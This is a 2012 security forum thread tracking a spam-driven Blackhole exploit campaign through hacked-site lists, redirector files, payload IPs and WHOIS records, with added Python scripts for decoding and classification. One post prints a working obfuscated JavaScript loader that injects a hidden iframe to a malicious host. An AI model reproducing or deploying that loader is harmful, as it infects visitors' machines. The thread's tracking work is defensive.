Numerous malware drive by attempts

A place to discuss malware of every flavor, e.g. Storm, Waledac, Conficker and Zeus

Re: Numerous malware drive by attempts

Postby Red Dwarf » Thu Apr 05, 2012 4:55 pm

140 examples of URLs, month to date, that fit the format aceite.baurubkt.com.br/XTbWCY0y/index.html:
Code:
aceite.baurubkt.com.br
agapesaudeeestetica.com.br
alecarneiro.com.ar
aluguelciroimoveis.com.br
alumbradocatamarca.com.ar
anamariafitness.com.br
areiaana.com.br
arteestofaria.com.br
audio.peristaltika.com
barroso.mg.gov.br
bdeclinic.com.br
beckervideo.com.br
bedstodayonline.co.uk
blessingtour.com.br
boidamanta.com.br
borbis.home.pl
boutiquecoisasdemulher.com.br
camboatas.com.br
camboriucombateapedofilia.com.br
carmauto.com.br
casadacriancadobrasil.org.br
casadopisoindustrial.com.br
casamentosnanet.com.br
celikaydahiliticaret.com.tr
celtichearttattoo.co.uk
cfcbarravelha.com.br
cfcsouzaitajai.com.br
chayanam.pcriot.com
chocolatta.com.ar
ciaasaford.com.br
coisetamuchastegui.com.ar
contabilidadesuprema.com.br
corsiedilizia.topschool.it
cursosdeprogramacao.com.br
decoragyn.com.br
demo.syndicationradio.com
dev.hawaiitobaccocontrol.org
differenzaseguros.com.br
discern.com.tw
dismarlub.com.br
dlsnoba.org.ar
drywalltec.com.pe
dtcobaglung.gov.np
ebanodecor.com.br
elegant2.dev50.com
eliteworldhotel.com.tr
encoder.com.tr
esteticanovaphase.com.br
estovale.com.br
extremix.com.ar
fablabbudapest.zzl.org
festaseventosratimbum.com.br
freeimvucredits.altervista.org
ftp.bazingaup.hd1.com.br
ftp.blabben.com
ftp.clickhost.com
ftp.dressrail.com
ftp.fabiosampa.com.br
ftp.halsat.sk
ftp.kbsports.sk
ftp.motoron.saab900.hu
ftp.nimos.org
ftp.pontocomsistemas.com
gabrielemartufi.altervista.org
galleryshoponline.co.za
gastroseventos.com.br
getaway.com.br
goldomus.nuvola365.it
graficapontocor.com.br
grupozemaria.com.br
guessar.com.br
gunabaticollege.edu.bd
handicapdeportes.com.ar
haskellcosmeticos.com.br
heregospel.com.br
hotelpousadafeliz.com.br
hotelsofnewdelhi.co.in
javor.com.br
jornalcnn.com.br
kerastase.nohup.it
kharismacargo.com.br
knap.in.rs
lacasadivalentina.nurunadv.com
lavanderiatingimento.com.br
ledmodels.com.br
left.thinkpunk.net
lifenow.org.uk
linguagemc.com.br
lojaarainha.com.br
lojainconfidencia.com.br
macasdemassagem.com.br
macielcarburadores.com.br
mapaviagens.com.br
mashigiene.com.ar
mccanndigital.com.co
mocarski.csh.pl
ofb.com.br
okutanpetrol.com.tr
oliveira4x4.com.br
omenterprisespune.co.in
pastaegrill.com.br
perfumsjb.zxq.net
phatconcepts.co.za
pianco.com.br
plascombritadores.com.br
quickpdf.50webs.com
radiogloriaadeus.com.br
ramunas.myartsonline.com
s399270837.websitehome.co.uk
scequipamentos.com.br
scoalapelinie.biz.nf
scoalapelinie.host.org
scrondnews24.altervista.org
sdlceku.co.in
somostigreros.com.ve
splithouseclimatizacao.com.br
srilankanet.bplaced.de
stifte.bplaced.net
terracoffee.com.ar
test.ilkserver.com
thesteeldetailingcompany.co.uk
tomdev.blym.org.uk
tome1234.webd.pl
topseoz.co.uk
twins.99k.org
twins2.99k.org
urbannex.co.za
vajuco12.o2switch.net
vehivavy.to.mg
walterguerra.art.br
wbhost.com.br
wificomputacion.com.ar
winedeskwaterfront.co.za
wiseit.com.my
wl22www838.webland.ch
wl32www1024.webland.ch
wolumen.home.pl
wongtemen.awardspace.us
worldwidefitness.co.in
wp10635274.wp271.webpack.hosteurope.de
www.atiladagtekin.com
www.comprasemrivera.com.br
www.quefollon.com
xmweb.6te.net
xraytunnel.zxq.net
ycww06180.zxq.net
yildizliguven.com.tr
zillertal.bplaced.net
Red Dwarf
You are kiillllling-a my bizinisss!
Posts: 10431
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby Red Dwarf » Thu Apr 05, 2012 5:00 pm

There is only a small list of the random 8-character strings in these URLs. Out of 4,300 spammed URLs, and the above list of 140 domains, there are only 83:
Code:
0drnFhv7
1DvRtt7n
2HGyrfcS
2jp9AXAH
2qkQiMnF
3QZfWkhm
3zQeaNM3
40MVPL5A
45FduQJY
4txGy2fG
4yFr4xcK
4YT5yyBC
69XNZPEL
6D9UsT0U
6NdA66bR
7zVC6k3E
9ZT4hYfA
Afk3VXew
B5zgKR6Q
bbbphBAk
bfoDbwx9
bgJcXXRW
BhuiKoYb
bssCfPt7
c1LRK0ZP
C6dySjCV
cQr1Vwmc
CrdtoUx7
csy0DLtH
DnAp2Ghm
eorgFm72
eRUenRwz
fNEvTRU8
fsXAfd1c
G9sqcmby
GnZEAt4J
GSx77DTJ
GygpiJU2
HavsLLhq
jm8MjLwp
jRznQAtZ
JYsmHbAz
KEwcYqDR
kLVbyQJd
KNcdZkVP
KSSCc2L5
KWDLcEzD
KyEy67xZ
Nv8QYtkR
NYgzXnp0
o4qG9xyx
oQAJ1oDK
PHHZUajw
Puuy2Ats
PX34vf6P
Q9eXxDD9
QM52AoSo
QRtcuNBr
QTsYkFyh
rU8AcofP
rZSbBfZu
s3JgEpEu
sjFbaiZp
sKGtsgD9
tMYmWbcC
UpH1sBvS
V0s1S0nt
vBWtU4Fm
VCuA8Z5E
VTac3eXG
X9uJsv2d
XTbWCY0y
XwL6fwpr
XyG0BwzJ
Y9nEKFsH
yFxapB05
YY7LVHna
Z2bg1Pij
ZGhsFpjH
zh6jPwn1
zhN50DKp
ZQe8w6UJ
zUGqdj5E
Red Dwarf
You are kiillllling-a my bizinisss!
Posts: 10431
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Tue Apr 24, 2012 4:11 pm

This malware operation has gone through at least three (payload-bearing) IP addresses today:

188.165.65.221 (see the analysis at http://wepawet.iseclab.org/view.php?has ... 44&type=js )
208.117.43.8 (see http://wepawet.iseclab.org/domain.php?h ... 05&type=js )
72.46.137.57 (most recent; see http://wepawet.iseclab.org/view.php?has ... 00&type=js )

A few examples of the URLs that it has been using today are listed at

http://www.mywot.com/en/forum/21464-qai ... ent-138524
NotBuyingIt
Spammer Killing Machine
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu May 10, 2012 11:43 am

NotBuyingIt wrote: Perhaps the repeated revisions of the JavaScript files are a technique that has replaced the fast-flux ploy of manipulating DNS which Zeus botnets had been using.
I think the botnet is close to using an ensemble of JavaScript files as something like a fast-flux ploy. An ensemble of files, each on a different (hacked) site, is probably less vulnerable to getting shut down than a single DNS domain would be. I currently see the following ensemble of JavaScript redirectors being used [edited to show changed status]:

desiremobile.netfirms.com/i7K1Gp1g/js.js
hoteldooars.in/DbL72xH1/js.js
nisanurum.com/e7pFkjut/js.js [suspended]
pricedrightviewhomes.com/QiGaWKkT/js.js [HTTP 404]
s270915069.onlinehome.fr/go3wLLiK/js.js [HTTP 404]
shokani.net/YvKDGVwn/js.js
smithrz.hosting4less.com/CGrzhxx1/js.js [HTTP 403]
urbannex.co.za/SVVsEJwY/js.js [HTTP 404]

I currently see the following IP addresses being used, one at a time, as the redirection target.

69.194.194.90
98.158.129.17
173.236.88.179
174.140.168.175
NotBuyingIt
Spammer Killing Machine
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu May 24, 2012 12:59 pm

The service at jsunpack.jeek.org has been very helpful when examining (and documenting) the hacked sites that have been used in the drive-by / blackhole exploit. Unfortunately, it has only been responding with 'No space left on device' error messages for several days.

[Edit: Update] jsunpack.jeek.org has returned to service in early June.
NotBuyingIt
Spammer Killing Machine
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Jun 07, 2012 4:33 am

NotBuyingIt wrote: The intermediate JavaScript files seem to be revised from time to time to alter the redirection target. Perhaps the repeated revisions of the JavaScript files are a technique that has replaced the fast-flux ploy of manipulating DNS which Zeus botnets had been using.

I now see some circumstantial evidence that my speculation was accurate. The particular botnet uses various js.js files which all redirect to the same (putative) nginx server where malware installs are attempted. The JavaScript files in a current botnet campaign are slowly alternating their redirection target in a coordinated manner among several sites hosting its server. Here are some of the target sites that are currently in use in the alternation:

108.166.65.182:8080
nolgo.com:8080
69.194.196.34
204.145.80.216
64.111.24.122

I cannot claim that the alternation was intentionally developed to substitute for the fast flux ploy. It may just as well be described as an ad hoc occurrence instead of an under-development ploy. I continue to chronicle the sites exploited by the botnet at http://www.mywot.com/en/forum/21464-qai ... -2010-1885
NotBuyingIt
Spammer Killing Machine
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm
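The behaviour described in the post above, several js.js redirectors on unrelated hacked sites switching to the same new target at the same time, is something that can be checked mechanically once the files are fetched periodically. The script below is an added example and not code from the post. The observation log is constructed: the js.js hosts and the target addresses are taken from the thread, but the timestamps, and which target was seen at which time, are invented for illustration. The "coordinated" rule is my own simple one: at every observation time all live redirectors agree on a single target, and that shared target changes over time. It also shows the opposite case, which is what the later "fallen into disarray" post describes: redirectors that disagree at one observation time.

```python
from collections import defaultdict

# Constructed observation log: (time, js.js URL, redirection target, or None
# when the file returned an error).  Hosts and targets come from the thread;
# the times and the pairing of targets with times are invented for this example.
OBSERVATIONS = [
    ("2012-06-07T00:00", "desiremobile.netfirms.com/i7K1Gp1g/js.js", "108.166.65.182:8080"),
    ("2012-06-07T00:00", "hoteldooars.in/DbL72xH1/js.js",            "108.166.65.182:8080"),
    ("2012-06-07T00:00", "shokani.net/YvKDGVwn/js.js",               "108.166.65.182:8080"),
    ("2012-06-07T06:00", "desiremobile.netfirms.com/i7K1Gp1g/js.js", "nolgo.com:8080"),
    ("2012-06-07T06:00", "hoteldooars.in/DbL72xH1/js.js",            "nolgo.com:8080"),
    ("2012-06-07T06:00", "shokani.net/YvKDGVwn/js.js",               "nolgo.com:8080"),
    ("2012-06-07T12:00", "desiremobile.netfirms.com/i7K1Gp1g/js.js", "69.194.196.34"),
    ("2012-06-07T12:00", "hoteldooars.in/DbL72xH1/js.js",            "69.194.196.34"),
    ("2012-06-07T12:00", "shokani.net/YvKDGVwn/js.js",               None),  # e.g. HTTP 404
]


def targets_by_time(observations):
    """Map each observation time to the set of distinct targets seen across the
    live redirectors.  Dead files (target None) carry no information and are skipped."""
    seen = defaultdict(set)
    for when, _url, target in observations:
        if target is not None:
            seen[when].add(target)
    return dict(seen)


def rotation_sequence(observations):
    """One entry per observation time, in time order: the target all live
    redirectors shared at that time, or None if they disagreed."""
    by_time = targets_by_time(observations)
    return [next(iter(targets)) if len(targets) == 1 else None
            for _when, targets in sorted(by_time.items())]


def is_coordinated(observations):
    """True when every observation time shows exactly one shared target and that
    target changes at least once, i.e. the files rotate their target in lockstep."""
    sequence = rotation_sequence(observations)
    if not sequence or any(target is None for target in sequence):
        return False
    return len(set(sequence)) > 1


if __name__ == "__main__":
    print(rotation_sequence(OBSERVATIONS))
    print("coordinated:", is_coordinated(OBSERVATIONS))
```

Feeding it a real log is a matter of replacing OBSERVATIONS with (time, URL, target) rows from whatever fetches the files; the target is whatever the js.js redirects to at that moment, which is exactly the value the post says changes from revision to revision.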

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Wed Jun 13, 2012 1:06 am

Only a few days after I hypothesized an elaborate network, it appears to have fallen into disarray and the surviving zombie sites seem uncoordinated.

What could have happened?
NotBuyingIt
Spammer Killing Machine
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby Red Dwarf » Wed Jun 13, 2012 5:21 pm

6 days ago
ajppromocoesartisticas.com.br
archives.zxq.net
carandclassic.host.org
ftp.oblivious.taess.net
ftp.restorationonline.com.au
helitav.altervista.org
mondoorso.altervista.org
slsb.com.my
uportal.cloudaccess.net
web.piecraft.co.uk
www.alibostan.com
www.amaituoiocchi.it
www.dewaltdirect.com
www.incredibleandamans.com
www.laclaregroup.com
zehava.org.il

5 days ago
ajppromocoesartisticas.com.br
archives.zxq.net
carandclassic.host.org
ftp.oblivious.taess.net
helitav.altervista.org
mondoorso.altervista.org
slsb.com.my
uportal.cloudaccess.net
web.piecraft.co.uk
www.alibostan.com
www.amaituoiocchi.it
www.laclaregroup.com
zehava.org.il

4 days ago
ftp.oblivious.taess.net
slsb.com.my

3 days ago
none

2 days ago
ajppromocoesartisticas.com.br
helitav.altervista.org
slsb.com.my
www.laclaregroup.com
zehava.org.il

1 day ago
none

today
none

It does seem to be tapering off.
Red Dwarf
You are kiillllling-a my bizinisss!
Posts: 10431
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Jun 14, 2012 1:27 am

Red Dwarf wrote:It does seem to be tapering off.


I suspect that it may have been replaced by an older-style fast-flux botnet (without the js.js files) with the payload site at:

saprolaunimaxim.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c
173.224.209.130:8080/forum/showthread.php?page=5fa58bce769e5c2c
78.83.233.242:8080/forum/showthread.php?page=5fa58bce769e5c2c

(Analysis at http://wepawet.iseclab.org/view.php?hash=1b46c8b7116e264981a21f5cb2103c61&t=1339650959&type=js)

After the infections are attempted, the exploit redirects to google.de

It uses a different template for the deceptive URLs in its spam. For example:

www.rango.me/mail.htm
www.gift-book.sp.ru/mail.htm
solveigedda.com/mail.htm
www.gift-book.sp.ru/mail.htm
goalsforgirls.org/mail.htm
themostaffordableinsurance.com/mail.htm
www.ed.cl/mail.htm

(Analysis at http://urlquery.net/report.php?id=67642)

I've been noticing it for two days or so, but I have been too preoccupied with posting ill-tempered remarks on myWOT to characterize it adequately.
NotBuyingIt
Spammer Killing Machine
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm
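By this point the thread has shown three URL shapes: the spammed host/<8 chars>/index.html landing pages, the host/<8 chars>/js.js redirectors, and the newer host/.../mail.htm links. Sorting a feed of URLs into those shapes, and counting hosts and tokens per shape, is what turns Red Dwarf's "4,300 URLs, 140 domains, 83 tokens" observation into a repeatable check. The script below is an added example, not code from any poster; the template names are my own labels, and the sample list is constructed from hosts and tokens quoted in the posts plus one hypothetical URL that matches nothing.

```python
import re
from collections import Counter, defaultdict

# Hypothetical labels for the three URL shapes quoted in the thread.
TEMPLATES = {
    # host/<8 alphanumerics>/index.html : the spammed landing pages
    "token-index": re.compile(r"^(?:https?://)?([^/\s]+)/([A-Za-z0-9]{8})/index\.html$"),
    # host/<8 alphanumerics>/js.js      : the intermediate redirectors
    "token-jsjs": re.compile(r"^(?:https?://)?([^/\s]+)/([A-Za-z0-9]{8})/js\.js$"),
    # host[/any path]/mail.htm          : the later campaign's spam links
    "mail-htm": re.compile(r"^(?:https?://)?([^/\s]+)(?:/.*)?/mail\.htm$"),
}

# Constructed sample, not a poster's raw spam feed.  The last entry is a
# hypothetical URL included to show the unmatched path.
SAMPLE_URLS = [
    "aceite.baurubkt.com.br/XTbWCY0y/index.html",
    "agapesaudeeestetica.com.br/XTbWCY0y/index.html",
    "alecarneiro.com.ar/0drnFhv7/index.html",
    "http://urbannex.co.za/SVVsEJwY/js.js",
    "hoteldooars.in/DbL72xH1/js.js",
    "www.rango.me/mail.htm",
    "www.cppidf8.fr/plugins/fckeditor/FCKeditor/editor/plugins/ajaxfilemanager/inc/mail.htm",
    "http://example.net/other/page.html",
]


def classify(url):
    """Return (template, host, token) for a URL that fits one of the templates,
    or None.  token is None for the mail.htm shape, which carries no token."""
    for name, pattern in TEMPLATES.items():
        m = pattern.match(url.strip())
        if m:
            token = m.group(2) if pattern.groups >= 2 else None
            return name, m.group(1).lower(), token
    return None


def summarize(urls):
    """Per template: how many distinct hosts and tokens were seen.  Also records
    which hosts each token appeared on, so token reuse across hacked sites
    (the point of Red Dwarf's 83-token list) is visible directly."""
    hosts = defaultdict(set)
    tokens = defaultdict(Counter)
    token_hosts = defaultdict(set)
    unmatched = []
    for url in urls:
        hit = classify(url)
        if hit is None:
            unmatched.append(url)
            continue
        template, host, token = hit
        hosts[template].add(host)
        if token:
            tokens[template][token] += 1
            token_hosts[token].add(host)
    return {
        "hosts": {t: len(h) for t, h in hosts.items()},
        "tokens": {t: len(c) for t, c in tokens.items()},
        "token_hosts": {t: sorted(h) for t, h in token_hosts.items()},
        "unmatched": unmatched,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_URLS).items():
        print(key, value)
```

The useful output is the ratio of tokens to hosts: a small token set reused across many hacked hosts is a campaign fingerprint, and a proxy or mail filter rule on the path shape (eight alphanumerics followed by /index.html or /js.js) catches new hosts before any domain list does. The mail.htm pattern is deliberately loose about the directory, since the thread shows it dropped into editor plugin directories as well as document roots.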

Re: Numerous malware drive by attempts

Postby AlphaCentauri » Thu Jun 14, 2012 12:13 pm

NotBuyingIt wrote:I've been noticing it for two days or so, but I have been too preoccupied with posting ill-tempered remarks on myWOT to characterize it adequately.


Trying to keep my cool on the WOT forum makes me think of the Bob Dylan Lyrics:
In a soldier's stance, I aimed my hand
At the mongrel dogs who teach
Fearing not that I'd become my enemy
In the instant that I preach
My existence led by confusion boats
Mutiny from stern to bow
Ahh, but I was so much older then
I'm younger than that now
AlphaCentauri
You are kiillllling-a my bizinisss!
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Numerous malware drive by attempts

Postby Red Dwarf » Thu Jun 14, 2012 6:56 pm

Are these all examples? Found over the last 3 days but not before that:
Code:
aymeric.pansu.net/mail.htm
blog.yourls.org/mail.htm
guitar.nyanta.jp/m/mail.htm
igeek.org.gg/mail.htm
ker.cal24.pl/mail.htm
printhouse.inf.br/images/mail.htm
sonjamarinkovic.edu.rs/mail.htm
webmail.firstbaja.com/mail.htm
www.aleco.co.rs/mail.htm
www.arhitrav.rs/mail.htm
www.bjhbxn.com/mail.htm
www.cppidf8.fr/plugins/fckeditor/FCKeditor/editor/plugins/ajaxfilemanager/inc/mail.htm
www.deveducation.co.in/mail.htm
www.ed.cl/mail.htm
www.kiraken.co.jp/admin/mail.htm
www.neimarkg.rs/mail.htm
www.paz.cl/mail.htm
www.portalminassaude.com.br/javascript/tiny_mce/plugins/ajaxfilemanager/inc/mail.htm
www.rango.me/mail.htm
www.snd.org.rs/katalog/mail.htm


Live site payload:
Code:
<h1><b>Please Wait... Loading...</h1></b>

<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";
e=window["eval"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,
333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,
303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,230,291,448,114,222,324,388,117,220,315,
436,97,240,315,436,46,228,351,232,56,96,168,192,47,204,333,456,117,218,141,460,104,222,357,464,104,228,303,388,100,92,336,416,112,126,336,388,103,202,183,212,102,
194,159,224,98,198,303,220,54,114,303,212,99,100,297,156,32,238,315,400,116,208,183,156,49,96,117,128,104,202,315,412,104,232,183,156,49,96,117,128,115,232,363,
432,101,122,117,472,105,230,315,392,105,216,315,464,121,116,312,420,100,200,303,440,59,224,333,460,105,232,315,444,110,116,291,392,115,222,324,468,116,202,177,
432,101,204,348,232,48,118,348,444,112,116,144,236,39,124,180,188,105,204,342,388,109,202,186,136,41,118,39,36,9,250,39,36,9,204,351,440,99,232,315,444,110,64,
315,408,114,194,327,404,114,80,123,492,13,18,27,36,118,194,342,128,102,64,183,128,100,222,297,468,109,202,330,464,46,198,342,404,97,232,303,276,108,202,327,404,
110,232,120,156,105,204,342,388,109,202,117,164,59,204,138,460,101,232,195,464,116,228,315,392,117,232,303,160,39,230,342,396,39,88,117,416,116,232,336,232,47,94,
345,388,112,228,333,432,97,234,330,420,109,194,360,420,109,92,342,468,58,112,144,224,48,94,306,444,114,234,327,188,115,208,333,476,116,208,342,404,97,200,138,
448,104,224,189,448,97,206,303,244,53,204,291,212,56,196,297,404,55,108,171,404,53,198,150,396,39,82,177,408,46,230,348,484,108,202,138,472,105,230,315,392,105,
216,315,464,121,122,117,416,105,200,300,404,110,78,177,408,46,230,348,484,108,202,138,448,111,230,315,464,105,222,330,244,39,194,294,460,111,216,351,464,101,78,
177,408,46,230,348,484,108,202,138,432,101,204,348,244,39,96,117,236,102,92,345,464,121,216,303,184,116,222,336,244,39,96,117,236,102,92,345,404,116,130,348,464,
114,210,294,468,116,202,120,156,119,210,300,464,104,78,132,156,49,96,117,164,59,204,138,460,101,232,195,464,116,228,315,392,117,232,303,160,39,208,303,420,103,
208,348,156,44,78,147,192,39,82,177,52,9,18,27,400,111,198,351,436,101,220,348,184,103,202,348,276,108,202,327,404,110,232,345,264,121,168,291,412,78,194,327,404,
40,78,294,444,100,242,117,164,91,96,279,184,97,224,336,404,110,200,201,416,105,216,300,160,102,82,177,52,9,18,375];if(window.document)for(i=6-2-1-2-1;-655+i!=
2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}}</script>
Red Dwarf
You are kiillllling-a my bizinisss!
Posts: 10431
Joined: Tue Jun 27, 2006 2:01 am
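The script in the post above is the usual Blackhole-style loader: an integer array turned back into source with String.fromCharCode and handed to eval. It decodes without being run, as long as the decoding rule is read off the sample rather than assumed. The rule here is h=-012/5, which JavaScript reads with the leading zero as octal, so h is -2 and h*h is 4; element i is divided by (i % 4)+1, and the loop bound -655+i!=0 means exactly 655 elements. The script below is an added example, not code from the post or from the kit; it reproduces that rule in Python over the array copied from the post and then extracts the URLs from the result.

```python
import re

# Integer array n=[...] copied from the loader script in the post above.
# The JavaScript loop "for(i=0; -655+i != 0; i++)" covers exactly 655 entries.
PAYLOAD_ARRAY = [
    9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,
    333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,
    303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,230,291,448,114,222,324,388,117,220,315,
    436,97,240,315,436,46,228,351,232,56,96,168,192,47,204,333,456,117,218,141,460,104,222,357,464,104,228,303,388,100,92,336,416,112,126,336,388,103,202,183,212,102,
    194,159,224,98,198,303,220,54,114,303,212,99,100,297,156,32,238,315,400,116,208,183,156,49,96,117,128,104,202,315,412,104,232,183,156,49,96,117,128,115,232,363,
    432,101,122,117,472,105,230,315,392,105,216,315,464,121,116,312,420,100,200,303,440,59,224,333,460,105,232,315,444,110,116,291,392,115,222,324,468,116,202,177,
    432,101,204,348,232,48,118,348,444,112,116,144,236,39,124,180,188,105,204,342,388,109,202,186,136,41,118,39,36,9,250,39,36,9,204,351,440,99,232,315,444,110,64,
    315,408,114,194,327,404,114,80,123,492,13,18,27,36,118,194,342,128,102,64,183,128,100,222,297,468,109,202,330,464,46,198,342,404,97,232,303,276,108,202,327,404,
    110,232,120,156,105,204,342,388,109,202,117,164,59,204,138,460,101,232,195,464,116,228,315,392,117,232,303,160,39,230,342,396,39,88,117,416,116,232,336,232,47,94,
    345,388,112,228,333,432,97,234,330,420,109,194,360,420,109,92,342,468,58,112,144,224,48,94,306,444,114,234,327,188,115,208,333,476,116,208,342,404,97,200,138,
    448,104,224,189,448,97,206,303,244,53,204,291,212,56,196,297,404,55,108,171,404,53,198,150,396,39,82,177,408,46,230,348,484,108,202,138,472,105,230,315,392,105,
    216,315,464,121,122,117,416,105,200,300,404,110,78,177,408,46,230,348,484,108,202,138,448,111,230,315,464,105,222,330,244,39,194,294,460,111,216,351,464,101,78,
    177,408,46,230,348,484,108,202,138,432,101,204,348,244,39,96,117,236,102,92,345,464,121,216,303,184,116,222,336,244,39,96,117,236,102,92,345,404,116,130,348,464,
    114,210,294,468,116,202,120,156,119,210,300,464,104,78,132,156,49,96,117,164,59,204,138,460,101,232,195,464,116,228,315,392,117,232,303,160,39,208,303,420,103,
    208,348,156,44,78,147,192,39,82,177,52,9,18,27,400,111,198,351,436,101,220,348,184,103,202,348,276,108,202,327,404,110,232,345,264,121,168,291,412,78,194,327,404,
    40,78,294,444,100,242,117,164,91,96,279,184,97,224,336,404,110,200,201,416,105,216,300,160,102,82,177,52,9,18,375,
]


def decode_loader(values, h=-0o12 / 5):
    """Reproduce the loader's decoding loop without eval.

    The sample sets h=-012/5.  A leading 0 makes 012 octal (decimal 10) in
    sloppy-mode JavaScript, so h == -2 and h*h == 4; Python's -0o12/5 is the
    same -2.0.  Element i is divided by (i % 4) + 1 and fed to
    String.fromCharCode, which truncates to an integer, hence int() here.
    """
    period = int(h * h)
    return "".join(chr(int(v / (i % period + 1))) for i, v in enumerate(values))


URL_RE = re.compile(r"https?://[^'\"\s<>]+")


def extract_urls(script_text):
    """Distinct URLs embedded in decoded script text, sorted."""
    return sorted(set(URL_RE.findall(script_text)))


if __name__ == "__main__":
    decoded = decode_loader(PAYLOAD_ARRAY)
    print(decoded.replace("\r", "\n"))
    print(extract_urls(decoded))
```

Run stand-alone it prints the decoded loader, which is an if/else that injects a hidden 10 by 10 iframe (document.write in one branch, createElement plus appendChild in the other), and the one distinct URL in it: http://saprolaunimaxim.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c, the same payload address NotBuyingIt quoted earlier in the thread. Other samples from this kit vary h and the loop bound, so both should be taken from the sample each time rather than hard-coded.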

Re: Numerous malware drive by attempts

Postby Red Dwarf » Thu Jun 14, 2012 7:16 pm

The target site details:
domain: SAPROLAUNIMAXIM.RU
nserver: ns1.saprolaunimaxim.ru. 62.213.64.161 [RU]
nserver: ns2.saprolaunimaxim.ru. 62.76.189.62 [RU]
nserver: ns3.saprolaunimaxim.ru. 85.214.204.32 [DE]
nserver: ns4.saprolaunimaxim.ru. 50.57.88.200 [Rackspace, US]
nserver: ns5.saprolaunimaxim.ru. 41.66.137.155 [ZA]
nserver: ns6.saprolaunimaxim.ru. 50.57.43.49 [Rackspace, US]
state: REGISTERED, NOT DELEGATED, UNVERIFIED
person: Private Person
registrar: NAUNET-REG-RIPN
admin-contact: https://client.naunet.ru/c/whoiscontact
created: 2012.06.05
paid-till: 2013.06.05
free-date: 2013.07.06

Host SAPROLAUNIMAXIM.RU not found: 3(NXDOMAIN)
Red Dwarf
You are kiillllling-a my bizinisss!
Posts: 10431
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Jun 14, 2012 11:21 pm

Red Dwarf wrote:Are these all examples? Found over the last 3 days but not before that

Yes, the URLs which attempt to contact saprolaunimaxim.ru participate in the exploit. A seventh "NS" record for saprolaunimaxim.ru is not currently being reported; it was IP 184.106.189.124

The two old "A" records for saprolaunimaxim.ru which are not currently being reported by its DNS still host the payload site; they are IP 173.224.209.130 and IP 78.83.233.242
NotBuyingIt
Spammer Killing Machine
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Fri Jun 15, 2012 3:02 pm

I've come across some fresh reports of a botnet which is using js.js files instead of a fast flux tactic. My lists today are at http://www.mywot.com/en/forum/21464-qai ... ent-146928
NotBuyingIt
Spammer Killing Machine
Posts: 607
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby Red Dwarf » Fri Jun 15, 2012 5:48 pm

Refer to the Wepawet analysis

http://wepawet.iseclab.org/view.php?has ... 13&type=js
for spammed URL
Code:
   http://www.sudas.com.cn/mail.htm


Summary:
Code:
In particular, the following URLs were found to contain malicious content:

    http://sumatranajuge.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c
    http://sumatranajuge.ru:8080/forum/REST.jar

Exploits
Name                                  Description                                               Reference
HPC URL                               Help Center URL Validation Vulnerability                  CVE-2010-1885
AtomicReferenceArray unsafe typing    Type safety violation in the AtomicReferenceArray class   CVE-2012-0507


Target:
sumatranajuge.ru has address 173.224.209.130 [Psychz Networks, Walnut, CA, US]
sumatranajuge.ru has address 213.17.171.186 [Warsaw, PL]
sumatranajuge.ru has address 78.83.233.242 [MVN Systems Ltd. BG]
sumatranajuge.ru has address 110.234.176.99 [New Delhi, IN]

Name servers
ns1.sumatranajuge.ru. 62.213.64.161
ns2.sumatranajuge.ru. 62.76.189.62
ns3.sumatranajuge.ru. 85.214.204.32
ns4.sumatranajuge.ru. 50.57.88.200
ns5.sumatranajuge.ru. 41.66.137.155
ns6.sumatranajuge.ru. 50.57.43.49

[EDIT June 18]
domain: SUMATRANAJUGE.RU
nserver: ns1.sumatranajuge.ru. 62.213.64.161
nserver: ns2.sumatranajuge.ru. 62.76.189.62
nserver: ns3.sumatranajuge.ru. 85.214.204.32
nserver: ns4.sumatranajuge.ru. 50.57.88.200
nserver: ns5.sumatranajuge.ru. 41.66.137.155
nserver: ns6.sumatranajuge.ru. 50.57.43.49
state: REGISTERED, NOT DELEGATED, UNVERIFIED
Red Dwarf
You are kiillllling-a my bizinisss!
Posts: 10431
Joined: Tue Jun 27, 2006 2:01 am
